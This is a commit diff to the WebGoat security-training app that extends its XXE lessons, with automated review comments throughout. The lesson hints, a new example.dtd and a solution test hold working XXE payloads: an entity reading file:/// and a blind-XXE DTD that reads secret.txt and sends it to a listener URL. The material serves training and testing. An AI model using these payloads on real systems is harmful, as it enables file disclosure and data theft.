Extended and fixed some lessons
@ -4,6 +4,7 @@ import com.google.common.base.Charsets;
|
||||
import com.google.common.io.Files;
|
||||
import lombok.SneakyThrows;
|
||||
import org.owasp.webgoat.assignments.AssignmentEndpoint;
|
||||
import org.owasp.webgoat.assignments.AssignmentHints;
|
||||
import org.owasp.webgoat.assignments.AssignmentPath;
|
||||
import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
@ -49,6 +50,7 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
|
||||
* @since November 18, 2016
|
||||
*/
|
||||
@AssignmentPath("xxe/blind")
|
||||
@AssignmentHints({"xxe.blind.hints.1","xxe.blind.hints.2","xxe.blind.hints.3","xxe.blind.hints.4","xxe.blind.hints.5"})
|
||||
public class BlindSendFileAssignment extends AssignmentEndpoint {
|
||||
|
||||
static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
|
||||
|
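Review bot: `CONTENTS` on the last line of the second hunk is package-private and built with `randomAlphabetic(10)`, which commons-lang3 documents as backed by a non-cryptographic RNG; that is only acceptable because the value is a per-JVM-start marker (presumably what the blind lesson later checks for, the use is outside the hunk) rather than a real secret, and the field does not say so. I'd put `// Marker the student must exfiltrate via blind XXE; regenerated on every JVM start. Not a real secret, so a non-CSPRNG is fine here.` above it. The five `xxe.blind.hints.*` keys named in the new `@AssignmentHints` all exist in the properties hunk of this commit, so the annotation is consistent. The class body continues past the hunk.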
@ -51,7 +51,7 @@ import static org.springframework.web.bind.annotation.RequestMethod.POST;
|
||||
* @since 4/8/17.
|
||||
*/
|
||||
@AssignmentPath("xxe/simple")
|
||||
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4"})
|
||||
@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
|
||||
public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
private final static String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
|
||||
|
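Review bot: `DEFAULT_LINUX_DIRECTORIES` on the last hunk line uses the non-canonical modifier order `private final static`; the JLS ordering (and Checkstyle's ModifierOrder) is `private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};`. As the name admits, the array is Unix-specific: if it is what the solution check looks for in the `file:///` listing that hint 4 suggests (the use is outside the hunk), students running WebGoat on Windows cannot pass, which deserves at least `// Directory names expected in a file:/// listing; assumes a Unix-like host.` The extended `@AssignmentHints` line matches the six `xxe.hints.simple.xxe.*` keys in the properties hunk. The class continues past the hunk.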
@ -30,9 +30,17 @@ xxe.content.output=Welcome {0} you can now login to our website
|
||||
xxe.blind.output=Contents of the file is: {0}
|
||||
|
||||
xxe.hints.simple.xxe.1=Try submitting the form and see what happens
|
||||
xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
|
||||
xxe.hints.simple.xxe.3=Try to include your own DTD
|
||||
xxe.hints.simple.xxe.4=Try to include a doctype "(<!DOCTYPE...)" in the xml
|
||||
xxe.hints.simple.xxe.2=Use ZAP/Burp to intercept the request and try to include your own DTD
|
||||
xxe.hints.simple.xxe.3=Try to include a doctype "(<!DOCTYPE...)" in the xml
|
||||
xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]>
|
||||
xxe.hints.simple.xxe.5=Do not forget to reference the entity
|
||||
xxe.hints.simple.xxe.6=In the comment you should references: <comment><text>&root;test</text></comment>
|
||||
|
||||
xxe.hints.content.type.xxe.1=Take a look at the content type
|
||||
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
|
||||
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
|
||||
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
|
||||
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
|
||||
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
|
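Review bot: Hint 4 (`xxe.hints.simple.xxe.4`) shows `<!DOCTYPE user [...]>` while hint 6 and `xxe.blind.hints.5` both use a `<comment>` document root; a non-validating parser accepts the mismatch, but a learner who pastes both hints ends up with a DOCTYPE naming an element that does not occur in their document. I'd make the hints agree: `xxe.hints.simple.xxe.4=The include can be as follows: <!DOCTYPE comment [<!ENTITY root SYSTEM "file:///"> ]>`. Hint 6 also reads `you should references`; it should be `In the comment you should reference the entity: <comment><text>&root;test</text></comment>`. The `xxe.hints.content.type.xxe.2` line is printed twice with identical text, which looks like a trailing-newline change rather than a duplicated key, but it is worth confirming in the raw diff since a duplicate key in a `.properties` file is silently last-wins.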
@ -0,0 +1,5 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>">
|
||||
%all;
|
||||
~
|
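Review bot: The `%file` entity on line 2 of the new file hard-codes a developer's home directory and a specific milestone version, `file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt`, yet `xxe.blind.hints.4` in this same commit points students at this file as the DTD to use; on any other machine the entity resolves to nothing and the exfiltration fails with no hint as to why. Use an obvious placeholder and say so inside the DTD, e.g. `<!-- Adjust both URLs: the file: path must point at <webgoat home>/XXE/secret.txt and the http: host at your WebWolf instance -->` above `<!ENTITY % file SYSTEM "file:///path/to/.webgoat/XXE/secret.txt">`. Note also that `%file;` is spliced unencoded into the `landing?text=` query string, so file contents with characters that are not URL-safe may not survive the request — the limitation the acunetix article linked from blind hint 3 describes, and worth a one-line comment here as well.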
@ -3,5 +3,5 @@
|
||||
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
|
||||
So this might result in JSON endpoints being vulnerable to XXE attacks.
|
||||
|
||||
Again same exercise but try to perform the same XML injection as we did in first assigment.
|
||||
Again same exercise but try to perform the same XML injection as we did in first assignment.
|
||||
|
||||
|
@ -71,6 +71,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
|
||||
@Test
|
||||
public void solve() throws Exception {
|
||||
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
|
||||
//Host DTD on WebWolf site
|
||||
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
|
||||
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
|
||||
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
|
||||
@ -80,6 +81,8 @@ public class BlindSendFileAssignmentTest extends LessonTest {
|
||||
.withStatus(200)
|
||||
.withBody(dtd)));
|
||||
webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
|
||||
|
||||
//Make the request from WebGoat
|
||||
String xml = "<?xml version=\"1.0\"?>" +
|
||||
"<!DOCTYPE comment [" +
|
||||
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +
|
||||
|
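Review bot: The new `/landing.*` stub at the top of the second hunk answers every exfiltration request with 200, but nothing in either hunk checks that a request carrying the secret actually reached WebWolf; `solve()` continues past the hunk, so if the remainder asserts only on the assignment's response, consider adding `webwolfServer.verify(getRequestedFor(urlMatching("/landing.*")).withQueryParam("text", containing("WebGoat")));` so a regression in parameter-entity expansion is caught by this test rather than only by the lesson's own check. `http://localhost:8081` is repeated in both the hosted DTD and the request XML; deriving it from the WireMock server's port would keep the two in sync (inferred — the server setup is outside the hunk). Building the `%file` URL from `targetFile.toURI()` keeps the test portable, unlike the shipped `example.dtd` in this commit, which still carries a hard-coded home path.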